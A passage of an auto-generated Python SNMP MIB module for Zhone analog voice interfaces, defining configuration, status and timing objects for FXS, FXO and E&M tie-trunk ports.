if mibBuilder.loadTexts: zhoneVaIfFXSRingFrequency.setDescription('the ring frequency to be used in the FXS interface. ringFrequency25 - ring frequency 25 Hertz. ringFrequency50 - ring frequency 50 Hertz. ringFrequency20 - ring frequency 20 Hertz.(Default) ringFrequency30 - ring frequency 30 Hertz. ')
zhoneVaIfFXSRingBack = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("on", 1), ("off", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXSRingBack.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSRingBack.setDescription('the ring back is requested if this variable is set to on.')
zhoneVaIfFXSStatusTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 2), )
if mibBuilder.loadTexts: zhoneVaIfFXSStatusTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSStatusTable.setDescription('The Foreign Exchange Station (FXS) interface Status Table. It contains hook status, ring active and other states of the interface. ')
zhoneVaIfFXSStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 2, 1), )
zhoneVaIfFXSCfgEntry.registerAugmentions(("Zhone-VOICE-ANALOG-IF-MIB", "zhoneVaIfFXSStatusEntry"))
zhoneVaIfFXSStatusEntry.setIndexNames(*zhoneVaIfFXSCfgEntry.getIndexNames())
if mibBuilder.loadTexts: zhoneVaIfFXSStatusEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSStatusEntry.setDescription('An entry in the status table for each FXS interface. ')
zhoneVaIfFXSHookStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 2, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("onHook", 1), ("offHook", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXSHookStatus.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSHookStatus.setDescription('This object contains the hook status of FXS interface. onHook - the connected equipment(e.g., phone) is onHook. offHook - the connected equipment is offHook. ')
zhoneVaIfFXSRingActive = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 2, 1, 2), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXSRingActive.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSRingActive.setDescription("This object contains the outgoing ring active indication. If the object value is true, then the interface is currently generating ring out to the Key Telephone System (KTS) or Plain Old Telephone (POT); otherwise, it doesn't. ")
zhoneVaIfFXSRingGround = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 2, 1, 3), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXSRingGround.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSRingGround.setDescription("This object contains the incoming ring ground indication. It is only valid when the zvaIfFXSCfgSignalType is fxsGroundStart. If the object is true, then the interface is presenting a ring ground to the connected equipment; otherwise, it doesn't. ")
zhoneVaIfFXSTipGround = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 2, 1, 4), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXSTipGround.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSTipGround.setDescription("This object contains the incoming tip ground indication. It is only valid when the zvaIfFXSCfgSignalType is fxsGroundStart. If the object is true, then the interface is detecting a tip ground at the interface; otherwise, it doesn't. ")
zhoneVaIfFXSTimingTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 3), )
if mibBuilder.loadTexts: zhoneVaIfFXSTimingTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSTimingTable.setDescription('The FXS interface Timing Parameters table. It contains the configuration of the various FXS signaling protocol timing parameters. ')
zhoneVaIfFXSTimingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 3, 1), )
zhoneVaIfFXSCfgEntry.registerAugmentions(("Zhone-VOICE-ANALOG-IF-MIB", "zhoneVaIfFXSTimingEntry"))
zhoneVaIfFXSTimingEntry.setIndexNames(*zhoneVaIfFXSCfgEntry.getIndexNames())
if mibBuilder.loadTexts: zhoneVaIfFXSTimingEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSTimingEntry.setDescription('An entry in the FXS Timing Parameters Table for each FXS interface.')
zhoneVaIfFXSTimingDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(50, 500))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXSTimingDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSTimingDigitDuration.setDescription('Outgoing DTMF digit duration in milliseconds. The default value of this object is 100 milliseconds. This field is not supported. ')
zhoneVaIfFXSTimingInterDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(50, 500))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXSTimingInterDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSTimingInterDigitDuration.setDescription('Outgoing DTMF inter-digit duration in milliseconds. The default value of this object is 100 milliseconds. This field is not supported. ')
zhonePotsRingTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 4), )
if mibBuilder.loadTexts: zhonePotsRingTable.setStatus('deprecated')
if mibBuilder.loadTexts: zhonePotsRingTable.setDescription('Table to execute diagnostic potsring command. Row in table with non-zero timer will ring pots port. Currently, maximum of 4 rows at a time are supported.')
zhonePotsRingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 4, 1), ).setIndexNames((0, "Zhone-VOICE-ANALOG-IF-MIB", "zhonePotsRingIfIndex"))
if mibBuilder.loadTexts: zhonePotsRingEntry.setStatus('deprecated')
if mibBuilder.loadTexts: zhonePotsRingEntry.setDescription('potsring table entry')
zhonePotsRingIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 4, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: zhonePotsRingIfIndex.setStatus('deprecated')
if mibBuilder.loadTexts: zhonePotsRingIfIndex.setDescription('Physical pots interface.')
zhonePotsRingRingingCadence = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 4, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))).clone(namedValues=NamedValues(("ring-cadence-r0", 1), ("ring-cadence-r1", 2), ("ring-cadence-r2", 3), ("ring-cadence-r3", 4), ("ring-cadence-r4", 5), ("ring-cadence-r5", 6), ("ring-cadence-r6", 7), ("ring-cadence-r7", 8), ("ring-cadence-common", 9), ("ring-cadence-splash", 10))).clone(9)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: zhonePotsRingRingingCadence.setStatus('deprecated')
if mibBuilder.loadTexts: zhonePotsRingRingingCadence.setDescription('Ring cadence to use in test.')
zhonePotsRingTimer = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 4, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 9999)).clone(15)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: zhonePotsRingTimer.setStatus('deprecated')
if mibBuilder.loadTexts: zhonePotsRingTimer.setDescription('Time in seconds to continue ringing.')
zhonePotsRingRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 4, 1, 4), ZhoneRowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: zhonePotsRingRowStatus.setStatus('deprecated')
if mibBuilder.loadTexts: zhonePotsRingRowStatus.setDescription('Row status')
zhoneVaIfFXOObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3))
zhoneVaIfFXOCfgTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 1), )
if mibBuilder.loadTexts: zhoneVaIfFXOCfgTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOCfgTable.setDescription('The FXO standard configuration table. It contains FXO configuration parameters, one entry per FXO interface. The configuration information of this table is set by hardware with its default setting or CLI during the hardware installation time. ')
zhoneVaIfFXOCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: zhoneVaIfFXOCfgEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOCfgEntry.setDescription('An entry in the standard configuration table for each FXO interface.')
zhoneVaIfFXOCfgSignalType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 1, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("fxoLoopStart", 1), ("fxoGroundStart", 2), ("fxodpt", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOCfgSignalType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOCfgSignalType.setDescription('the signaling type of FXO interface. fxoLoopStart - loop start. fxoGroundStart - ground start. fxodpt- Dial Pulse Terminating , this option allows the unit to attach to incoming one way trunks from a PBX , key system or a telephone set.. The default value of this object is fxoLoopStart(1). ')
zhoneVaIfFXOCfgNumberRings = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 10))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOCfgNumberRings.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOCfgNumberRings.setDescription('The number of rings detected before closing loop. The default value of this object is 1 ring.')
zhoneVaIfFXOCfgSupDisconnect = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 1, 1, 3), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOCfgSupDisconnect.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOCfgSupDisconnect.setDescription(" Specifies whether a supervisory disconnect signal (CPC) will be presented to the interface when the connected party at the interface hangs up. The default value of this object is 'true'. ")
zhoneVaIfFXOCfgDialType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("dtmf", 1), ("pulse", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOCfgDialType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOCfgDialType.setDescription('Specifies the out dialing type of FXO interface. dtmf - DTMF digit. pulse - pulse. The default value of this object is dtmf(1). ')
zhoneVaIfFXOStatusTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 2), )
if mibBuilder.loadTexts: zhoneVaIfFXOStatusTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOStatusTable.setDescription('The Foreign Exchange Office (FXO) interface Status Table. It contains hook status, ring detection and other states of the interface. ')
zhoneVaIfFXOStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 2, 1), )
zhoneVaIfFXOCfgEntry.registerAugmentions(("Zhone-VOICE-ANALOG-IF-MIB", "zhoneVaIfFXOStatusEntry"))
zhoneVaIfFXOStatusEntry.setIndexNames(*zhoneVaIfFXOCfgEntry.getIndexNames())
if mibBuilder.loadTexts: zhoneVaIfFXOStatusEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOStatusEntry.setDescription('An entry in the status table for each FXO interface. ')
zhoneVaIfFXOHookStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 2, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("onHook", 1), ("offHook", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXOHookStatus.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOHookStatus.setDescription('This object contains the hook status of FXO interface. onHook - Present the onHook to the connected equipment. offHook - Present the offHook to the connected equipment. ')
zhoneVaIfFXORingDetect = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 2, 1, 2), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXORingDetect.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXORingDetect.setDescription("This object contains the ring detect indication. If the value is true, then the interface detects ring from PBX or CO; otherwise, it doesn't.")
zhoneVaIfFXORingGround = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 2, 1, 3), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXORingGround.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXORingGround.setDescription("This object contains the incoming ring ground indication. It is only valid when the zvaIfFXOCfgSignalType is fxoGroundStart. If the object is true, then the interface is presenting a ring ground to the connected equipment; otherwise, it doesn't. ")
zhoneVaIfFXOTipGround = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 2, 1, 4), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXOTipGround.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOTipGround.setDescription("This object contains the incoming tip ground indication. It is only valid when the zvaIfFXOCfgSignalType is fxoGroundStart. If the object is true, then the interface is detecting a tip ground at the interface; otherwise, it doesn't. ")
zhoneVaIfFXOTimingTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 3), )
if mibBuilder.loadTexts: zhoneVaIfFXOTimingTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOTimingTable.setDescription('The FXO interface Timing Parameters table. It contains the configuration of the various FXO signaling protocol timing parameters. ')
zhoneVaIfFXOTimingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 3, 1), )
zhoneVaIfFXOCfgEntry.registerAugmentions(("Zhone-VOICE-ANALOG-IF-MIB", "zhoneVaIfFXOTimingEntry"))
zhoneVaIfFXOTimingEntry.setIndexNames(*zhoneVaIfFXOCfgEntry.getIndexNames())
if mibBuilder.loadTexts: zhoneVaIfFXOTimingEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOTimingEntry.setDescription('An entry in the FXO Timing Parameters Table for each FXO interface.')
zhoneVaIfFXOTimingDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(50, 500))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOTimingDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOTimingDigitDuration.setDescription('Outgoing DTMF digit duration in milliseconds. The default value of this object is 100 msec. ')
zhoneVaIfFXOTimingInterDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(50, 500))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOTimingInterDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOTimingInterDigitDuration.setDescription('Outgoing DTMF inter-digit duration in milliseconds. The default value of this object is 100 msec. ')
zhoneVaIfFXOTimingPulseRate = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 20))).setUnits('pps').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOTimingPulseRate.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOTimingPulseRate.setDescription('Outgoing pulse dialing rate in pulses per second (pps). The default value of this object is 10 pps. ')
zhoneVaIfFXOTimingPulseInterDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(100, 1000))).setUnits('pps').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOTimingPulseInterDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOTimingPulseInterDigitDuration.setDescription('Outgoing pulse dialing inter-digit timing in milliseconds. The default value of this object is 500 milliseconds. ')
zhoneVaIfEMObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4))
zhoneVaIfEMCfgTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 1), )
if mibBuilder.loadTexts: zhoneVaIfEMCfgTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMCfgTable.setDescription('The E&M standard configuration table. It contains the current setting of E&M configurable parameters. ')
zhoneVaIfEMCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: zhoneVaIfEMCfgEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMCfgEntry.setDescription('An entry in the standard configuration table for each E&M tie trunk interface.')
zhoneVaIfEMCfgSignalType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 1, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("winkStart", 1), ("immediateDial", 2), ("delayDial", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfEMCfgSignalType.setReference('EIA/TIA-464B: Sections 4.1.3.4.1 Signaling Protocols. ')
if mibBuilder.loadTexts: zhoneVaIfEMCfgSignalType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMCfgSignalType.setDescription("The signaling type of E&M tie trunk interface. winkStart - the calling side seizes the line by going off-hook on its E lead but waits for a short off-hook 'wink' indication on its M lead from the called side before sending address information as DTMF digits. immediateDial - the calling side seizes the line by going off-hook on its E lead and sends sends address information as DTMF digits. delayDial - the calling side seizes the line by going off-hook on its E lead. After a timing interval, the calling side looks at the supervision from the called side. If the supervision is on-hook, the calling side starts sending information as DTMF digits; otherwise, the calling side waits until the called side goes on-hook and then starts sending address information. The default value of this object is winkStart(1). ")
zhoneVaIfEMCfgOperation = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("twoWires", 1), ("fourWires", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfEMCfgOperation.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMCfgOperation.setDescription('Specify the operation of the E&M signal. twoWires - 2-wire operation. fourWires - 4-wire operation. The default value of this object is twoWires(1). ')
zhoneVaIfEMCfgType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8))).clone(namedValues=NamedValues(("typeI", 1), ("typeII", 2), ("typeIII", 3), ("typeIV", 4), ("typeV", 5), ("typeIIE", 6), ("typeIIM", 7), ("typeTO", 8)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMCfgType.setReference('EIA/TIA-464B: Sections 4.2.3 E&M Lead Signaling. ')
if mibBuilder.loadTexts: zhoneVaIfEMCfgType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMCfgType.setDescription('Specifies the E&M Lead Signaling type. LEGEND: V = -48V /\\/\\/ = detector/resister X = normally open relay contact + = normally closed relay contact G = ground SB = Signal Battery SG = Signal Ground typeI - Leads: E (output, relay to ground) M (input, referenced to ground) The tie line equipment (switch/router/etc) generates the E-signal to the PBX type grounding the E-lead. The tie line equipment detects the M-signal by detecting current flow to ground. A common ground must exist between the line equipment and the PBX. PBX | TIE LINE | E: V--/\\/\\/---|-----X----G | M: V----X-----|---/\\/\\/--G typeII - Leads: E (output, relay to SG) M (input, referenced to ground) SB (feed for M, connected to -48V) SG (return for E, galvanically isolated from ground) This interface requires no common ground between the equipment, thus avoiding ground loop noise problems. E-signal is generated toward the PBX by connecting it to SG. M-signal is indicated by the PBX connecting it to SB. While this interface does NOT require a common ground, it does have the tendency to inject noise into the audio paths since it is asymmetrical with respect to current flow between devices. PBX | TIE LINE | E: V--/\\/\\/---|-----X---- | | SG: G----------|---------- | M: ----X-----|---/\\/\\/--G | | SB: ----------|----------V typeIII - Leads: E (output, relay to ground) M (input, referenced to ground) SB (connected to -48V) SG (connected to ground) This interface operates similar to type I with respect to the E-signal. The M-signal, however, is indicated by the PBX connecting it to SB on assertion, and alternately connecting it to SG during inactivity. Unfortunately, a common ground must be shared between the equipment. PBX | TIE LINE | E: V--/\\/\\/---|-----X----G | SG: ----------|----------G + | M: ----------|---/\\/\\/--G X | SB: ----------|----------V typeIV - Leads: E (output, relay to SG) M (input, referenced to -48V) SB (feed for M, connected to ground) SG (return for E, galvanically isolated from ground) This interface is fully symmetrical; it does not require a common ground, does not inject noise into audio paths, and can be connected back to back by swapping E/SG for M/SB. E-signal is indicated to the PBX by connecting it to SG. M-signal is provided by the PBX connecting it to SB. PBX | TIE LINE | E: V--/\\/\\/---|-----X---- | | SG: G----------|---------- | M: ----------|---/\\/\\/--V X | SB: ----------|----------G typeV - Leads: E (output, relay to ground) M (input, referenced to -48V) Type V line equipment indicates E-signal to the PBX by grounding the E-lead. The PBX indicates M-signal by grounding the M-lead. This interface does require a common ground, but does allow back to back connections by swapping E for M. This interface is quasi-symmetric in that while the line is up, current flow is more or less equal between the PBX and line equipment. But noise injection is still a problem. PBX | TIE LINE | E: V--/\\/\\/---|-----X----G | M: G-----X----|---/\\/\\/--V | The default value of this object is typeI(1). ')
zhoneVaIfEMCfgDialType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("dtmf", 1), ("pulse", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfEMCfgDialType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMCfgDialType.setDescription('Specifies the out dialing type of E&M interface. dtmf - DTMF digit. pulse - pulse. The default value of this object is dtmf(1). ')
zhoneVaIfEMStatusTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 2), )
if mibBuilder.loadTexts: zhoneVaIfEMStatusTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMStatusTable.setDescription('The E&M interface Table. The table contains the status of the E&M tie trunk interface. ')
zhoneVaIfEMStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 2, 1), )
zhoneVaIfEMCfgEntry.registerAugmentions(("Zhone-VOICE-ANALOG-IF-MIB", "zhoneVaIfEMStatusEntry"))
zhoneVaIfEMStatusEntry.setIndexNames(*zhoneVaIfEMCfgEntry.getIndexNames())
if mibBuilder.loadTexts: zhoneVaIfEMStatusEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMStatusEntry.setDescription('An entry in the status table for each E&M interface. ')
zhoneVaIfEMInSeizureActive = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 2, 1, 1), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfEMInSeizureActive.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMInSeizureActive.setDescription("This object contains the incoming seizure state of the E&M interface. If the value is true, then the interface has an incoming trunk seizure active; otherwise, it doesn't. ")
zhoneVaIfEMOutSeizureActive = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 2, 1, 2), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfEMOutSeizureActive.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMOutSeizureActive.setDescription("This object contains the outgoing seizure state of the E&M interface. If the value is true, then the interface has an outgoing trunk seizure active; otherwise, it doesn't. ")
zhoneVaIfEMTimingTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3), )
if mibBuilder.loadTexts: zhoneVaIfEMTimingTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingTable.setDescription('The E&M tie trunk Timing Parameters table. It contains the configuration of the various E&M signaling protocol timing parameters. ')
zhoneVaIfEMTimingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1), )
zhoneVaIfEMCfgEntry.registerAugmentions(("Zhone-VOICE-ANALOG-IF-MIB", "zhoneVaIfEMTimingEntry"))
zhoneVaIfEMTimingEntry.setIndexNames(*zhoneVaIfEMCfgEntry.getIndexNames())
if mibBuilder.loadTexts: zhoneVaIfEMTimingEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingEntry.setDescription('An entry in the E&M Timing Parameters Table for each E&M interface.')
zhoneVaIfEMTimingDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(50, 500))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingDigitDuration.setDescription('Outgoing DTMF digit duration in milliseconds. The default value of this object is 100 milliseconds. ')
zhoneVaIfEMTimingInterDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(50, 500))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingInterDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingInterDigitDuration.setDescription('Outgoing DTMF inter-digit duration in milliseconds. The default value of this object is 100 milliseconds. ')
zhoneVaIfEMTimingPulseRate = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 20))).setUnits('pps').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingPulseRate.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingPulseRate.setDescription('Outgoing pulse dialing rate in pulses per second (pps). The default value of this object is 10 pps. ')
zhoneVaIfEMTimingPulseInterDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(100, 1000))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingPulseInterDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingPulseInterDigitDuration.setDescription('Outgoing Pulse dialing inter-digit timing in milliseconds. The default value of this object is 500 milliseconds. ')
zhoneVaIfEMTimingClearWaitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(200, 2000))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingClearWaitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingClearWaitDuration.setDescription('Time of Inactive seizure signal to declare call cleared. The default value of this object is 400 milliseconds.')
zhoneVaIfEMTimingMaxWinkWaitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(100, 5000))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingMaxWinkWaitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingMaxWinkWaitDuration.setDescription('Maximum time to wait from the outgoing seizure of the line to the time of sending out a wink-pulse. The default value of this object is 200 milliseconds.')
zhoneVaIfEMTimingMaxWinkDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(100, 3000))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingMaxWinkDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingMaxWinkDuration.setDescription('Maximum outgoing wink duration (between the wink-pulse leading edge and trailing edge) for wink start signaling. The default value of this object is 200 milliseconds.')
zhoneVaIfEMTimingDelayStart = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(20, 2000))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingDelayStart.setStatus('current')
